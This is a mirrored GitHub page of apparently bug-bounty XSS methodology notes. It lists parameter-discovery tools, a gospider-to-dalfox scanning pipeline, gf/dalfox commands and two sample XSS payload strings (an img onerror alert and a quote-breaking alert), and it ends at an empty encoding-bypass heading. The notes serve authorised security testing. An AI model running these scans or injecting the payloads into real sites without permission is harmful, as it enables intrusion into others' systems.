mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-29 07:00:20 +00:00
1.4 KiB
1.4 KiB
❌ xss
Get Parameter as much as possible
- https://github.com/devanshbatham/ParamSpider
- gospider -S tageturls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'|grep "=" | qsreplace -a | dalfox pipe -o result.txt
- Waybackurls | gau
- https://github.com/s0md3v/Arjun
- https://github.com/hakluke/hakrawler
- https://github.com/PortSwigger/param-miner
Combine all in a file and remove duplicates.
Run XSS fuzzer
Resources:
- https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start/
- https://infosecwriteups.com/tale-of-my-first-xss-27f622bc47c0
dalfox usage:
gf xss domain.txt | grep -Eo 'https?://[^\"]+' > domain.txt
dalfox file domain.txt -w 20 --silence
another technique to find XSS
- Scrape all urls from the domain using gau
- then sort the result using grep command:
cat url.txt | grep “utm_”
- do testing
resources:
Custom useful XSS Attack Vectors
testing"><img/src=x onerror=alert(/XSS/)//
testing'-alert(2)-'xss
Encoding Bypass: